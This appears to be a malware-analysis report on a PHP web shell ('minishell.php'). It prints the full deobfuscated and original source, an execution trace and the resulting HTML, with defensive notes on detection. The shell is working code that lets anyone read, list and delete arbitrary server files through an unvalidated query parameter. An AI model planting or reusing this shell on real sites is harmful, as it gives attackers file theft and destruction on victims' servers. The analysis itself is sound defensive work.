PHP Malware Analysis

minishell.php

md5: 370011e58a296750ccff912d5bf4ade1


Deobfuscated PHP code

<?php

// Directory the listing starts from. This deobfuscated copy hard-codes the
// path; the original source further down uses __DIR__, and the execution
// trace records the assignment as '/var/www/html/uploads' — i.e. the listing
// is rooted wherever the script itself was dropped.
$root = "/var/www/html";
// Inline CSS for the entry links: $style1 for entries is_file() accepts,
// $style2 (bold blue) for everything else (directories in the trace).
$style1 = 'color:#000;';
$style2 = 'color:#00a;font-weight:bold;';
/**
 * Parent of a directory path that ends in '/'.
 *
 * The trailing character is dropped first, then everything after the last
 * remaining '/' is cut off: '/var/www/html/uploads/' -> '/var/www/html'
 * (see the execution trace). If no '/' remains, strrpos() yields false and
 * the result is the empty string, exactly as the original behaves.
 */
function updir($ADir)
{
    $withoutTrailing = substr($ADir, 0, strlen($ADir) - 1);
    $lastSlash = strrpos($withoutTrailing, '/');
    return substr($withoutTrailing, 0, $lastSlash);
}
// Request dispatch. Every branch is keyed off the raw 'file' query parameter,
// which is never validated, canonicalised or confined to $root — any path the
// web-server account can reach is in scope. For detection, the trace on this
// page shows the sample executing from /var/www/html/uploads/, so requests
// carrying 'file' (and 'del') parameters to a PHP file in an upload directory
// are the observable; denying PHP execution there removes the vector.
if (isset($_GET['file'])) {
    // ?file=<path>&del=<anything>: delete the named path, then stop with no
    // output at all.
    if (isset($_GET['del'])) {
        unlink($_GET['file']);
        die;
    }
    // ?file=<regular file>: stream its raw bytes as text/plain and stop.
    // The trace on this page does not exercise this branch.
    if (is_file($_GET['file'])) {
        header("Content-type: text/plain");
        readfile($_GET['file']);
        return;
    }
    // Anything else is treated as a directory to list.
    $path = $_GET['file'] . '/';
} else {
    $path = $root . '/';
}
// Listing: root, current directory, parent link, one line per glob() match.
echo $root . '<br>';
echo $path . '<hr>';
// $path always ends in '/', which updir() strips before cutting at the last
// '/'; the generated HTML on this page shows '/var/www/html/' -> '/var/www'.
echo '<a href="?file=' . updir($path) . '">..</a><br />';
$p = $path . '*';
foreach (glob($p) as $file) {
    // Per entry: low four octal digits of the mode (e.g. '0777' in the trace),
    // a link back into this script (files in $style1, others in $style2),
    // size in bytes, and mtime. $file is echoed into the href unescaped.
    // NOTE(review): a '*' glob normally omits dot-files, so the listing is
    // not exhaustive.
    echo '<span style="font-size:11px;color:#777;">' . substr(sprintf('%o', fileperms($file)), -4) . '</span> <a style="' . (is_file($file) ? $style1 : $style2) . '" href="?file=' . $file . '">' . basename($file) . '</a> - <span style="font-size:11px;color:#777;">' . filesize($file) . ' - ' . date("F d Y H:i:s", filemtime($file)) . '</span><br />';
}
echo "<hr>";

Execution traces

data/traces/370011e58a296750ccff912d5bf4ade1_trace-1676250844.5004.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:14:30.398269]
1	0	1	0.000153	393528
1	3	0	0.000259	406296	{main}	1		/var/www/html/uploads/minishell.php	0	0
1		A						/var/www/html/uploads/minishell.php	2	$root = '/var/www/html/uploads'
1		A						/var/www/html/uploads/minishell.php	3	$style1 = 'color:#000;'
1		A						/var/www/html/uploads/minishell.php	4	$style2 = 'color:#00a;font-weight:bold;'
1		A						/var/www/html/uploads/minishell.php	27	$path = '/var/www/html/uploads/'
2	4	0	0.000337	406344	updir	1		/var/www/html/uploads/minishell.php	31	1	'/var/www/html/uploads/'
3	5	0	0.000351	406344	substr	0		/var/www/html/uploads/minishell.php	7	3	'/var/www/html/uploads/'	0	21
3	5	1	0.000366	406488
3	5	R			'/var/www/html/uploads'
2		A						/var/www/html/uploads/minishell.php	7	$ADir = '/var/www/html/uploads'
3	6	0	0.000392	406392	strrpos	0		/var/www/html/uploads/minishell.php	8	2	'/var/www/html/uploads'	'/'
3	6	1	0.000415	406464
3	6	R			13
3	7	0	0.000429	406392	substr	0		/var/www/html/uploads/minishell.php	8	3	'/var/www/html/uploads'	0	13
3	7	1	0.000443	406528
3	7	R			'/var/www/html'
2		A						/var/www/html/uploads/minishell.php	8	$ADir = '/var/www/html'
2	4	1	0.000468	406384
2	4	R			'/var/www/html'
1		A						/var/www/html/uploads/minishell.php	32	$p = '/var/www/html/uploads/*'
2	8	0	0.000493	406392	glob	0		/var/www/html/uploads/minishell.php	33	1	'/var/www/html/uploads/*'
2	8	1	0.000530	406984
2	8	R			[0 => '/var/www/html/uploads/data', 1 => '/var/www/html/uploads/minishell.php', 2 => '/var/www/html/uploads/prepend.php']
2	9	0	0.000551	406952	fileperms	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	9	1	0.000567	407024
2	9	R			16895
2	10	0	0.000580	406984	sprintf	0		/var/www/html/uploads/minishell.php	34	2	'%o'	16895
2	10	1	0.000595	407368
2	10	R			'40777'
2	11	0	0.000608	407304	substr	0		/var/www/html/uploads/minishell.php	34	2	'40777'	-4
2	11	1	0.000621	407400
2	11	R			'0777'
2	12	0	0.000634	407080	is_file	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	12	1	0.000647	407120
2	12	R			FALSE
2	13	0	0.000661	407144	basename	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	13	1	0.000676	407208
2	13	R			'data'
2	14	0	0.000689	407208	filesize	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	14	1	0.000703	407248
2	14	R			4096
2	15	0	0.000715	407208	filemtime	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/data'
2	15	1	0.000729	407248
2	15	R			1676250844
2	16	0	0.000742	407208	date	0		/var/www/html/uploads/minishell.php	34	2	'F d Y H:i:s'	1676250844
2	16	1	0.000798	409600
2	16	R			'February 12 2023 20:14:04'
2	17	0	0.000816	409048	fileperms	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	17	1	0.000832	409096
2	17	R			33204
2	18	0	0.000845	409056	sprintf	0		/var/www/html/uploads/minishell.php	34	2	'%o'	33204
2	18	1	0.000858	409440
2	18	R			'100664'
2	19	0	0.000871	409376	substr	0		/var/www/html/uploads/minishell.php	34	2	'100664'	-4
2	19	1	0.000884	409472
2	19	R			'0664'
2	20	0	0.000897	409152	is_file	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	20	1	0.000909	409192
2	20	R			TRUE
2	21	0	0.000922	409216	basename	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	21	1	0.000936	409288
2	21	R			'minishell.php'
2	22	0	0.000950	409280	filesize	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	22	1	0.000963	409320
2	22	R			987
2	23	0	0.000976	409280	filemtime	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/minishell.php'
2	23	1	0.000988	409320
2	23	R			1676250844
2	24	0	0.001001	409280	date	0		/var/www/html/uploads/minishell.php	34	2	'F d Y H:i:s'	1676250844
2	24	1	0.001032	409608
2	24	R			'February 12 2023 20:14:04'
2	25	0	0.001047	409056	fileperms	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	25	1	0.001062	409096
2	25	R			33261
2	26	0	0.001075	409056	sprintf	0		/var/www/html/uploads/minishell.php	34	2	'%o'	33261
2	26	1	0.001088	409440
2	26	R			'100755'
2	27	0	0.001100	409376	substr	0		/var/www/html/uploads/minishell.php	34	2	'100755'	-4
2	27	1	0.001113	409472
2	27	R			'0755'
2	28	0	0.001126	409152	is_file	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	28	1	0.001145	409192
2	28	R			TRUE
2	29	0	0.001158	409216	basename	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	29	1	0.001172	409288
2	29	R			'prepend.php'
2	30	0	0.001185	409280	filesize	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	30	1	0.001198	409320
2	30	R			57
2	31	0	0.001211	409280	filemtime	0		/var/www/html/uploads/minishell.php	34	1	'/var/www/html/uploads/prepend.php'
2	31	1	0.001224	409320
2	31	R			1676250844
2	32	0	0.001237	409280	date	0		/var/www/html/uploads/minishell.php	34	2	'F d Y H:i:s'	1676250844
2	32	1	0.001267	409608
2	32	R			'February 12 2023 20:14:04'
1	3	1	0.001284	408560
			0.001312	316136
TRACE END   [2023-02-12 23:14:30.399459]


Generated HTML code

<html><head></head><body>/var/www/html<br>/var/www/html/<hr><a href="?file=/var/www">..</a><br><span style="font-size:11px;color:#777;">0644</span> <a style="color:#000;" href="?file=/var/www/html/beneri.se_malware_analysis">beneri.se_malware_analysis</a> - <span style="font-size:11px;color:#777;">0 - February 12 2023 20:13:57</span><br><span style="font-size:11px;color:#777;">0664</span> <a style="color:#000;" href="?file=/var/www/html/minishell.php">minishell.php</a> - <span style="font-size:11px;color:#777;">987 - February 12 2023 20:13:57</span><br><hr></body></html>

Original PHP code

<?php
// Root of the listing is the directory this file lives in; the trace above
// records it as '/var/www/html/uploads' (the deobfuscated copy hard-codes
// '/var/www/html' instead).
$root = __DIR__;
// Link colours: $style1 when is_file() is true, $style2 (bold blue) otherwise.
$style1='color:#000;';
$style2='color:#00a;font-weight:bold;';

// Parent directory of a path that ends in '/': drop the trailing character,
// then keep everything before the last '/' that is left
// ('/var/www/html/uploads/' -> '/var/www/html' in the trace above). With no
// '/' left, strrpos() returns false and substr() yields '', as the original did.
function updir($ADir){
	$trimmed = substr($ADir, 0, strlen($ADir)-1);
	$cutAt = strrpos($trimmed, '/');
	return substr($trimmed, 0, $cutAt);
}

// Everything below is driven by the unvalidated 'file' query parameter: it is
// used verbatim for unlink(), is_file()/readfile() and the glob() prefix, with
// no confinement to $root. Observable on the wire as requests with 'file'
// (and 'del') parameters to an unexpected PHP file; the trace shows the sample
// running from /var/www/html/uploads/.
if (isset($_GET['file'])) { 

	// 'del' present: remove the named path and terminate with no output.
	if (isset($_GET['del'])){
		unlink($_GET['file']);
		die;
	}

	// Regular file: send its raw contents as text/plain and stop
	// (this branch is not exercised by the trace above).
	if (is_file($_GET['file'])) {
		header("Content-type: text/plain");
		readfile($_GET['file']);
		return;
	}

	// Otherwise the parameter is taken to be a directory to list.
	$path = $_GET['file'].'/';

} else $path = $root.'/';

// Listing output: root, current path, parent link, then one line per entry.
echo($root.'<br>');
echo($path.'<hr>');
// updir() relies on the trailing '/' added above; the generated HTML on this
// page shows '/var/www/html/' becoming '/var/www'.
echo '<a href="?file='.updir($path).'">..</a><br />';
$p = $path.'*';
foreach (glob($p) as $file) {
	// Mode as its low four octal digits, a link back into this script
	// ($style1 for files, $style2 otherwise), size in bytes and mtime.
	// $file goes into the href unescaped. NOTE(review): a '*' glob normally
	// leaves out dot-files.
	echo '<span style="font-size:11px;color:#777;">'.substr(sprintf('%o',fileperms($file)),-4).'</span> <a style="'.(is_file($file)?$style1:$style2).'" href="?file='.$file.'">'.basename($file).'</a> - <span style="font-size:11px;color:#777;">'.filesize($file).' - '.date("F d Y H:i:s", filemtime($file)).'</span><br />';
}
echo('<hr>');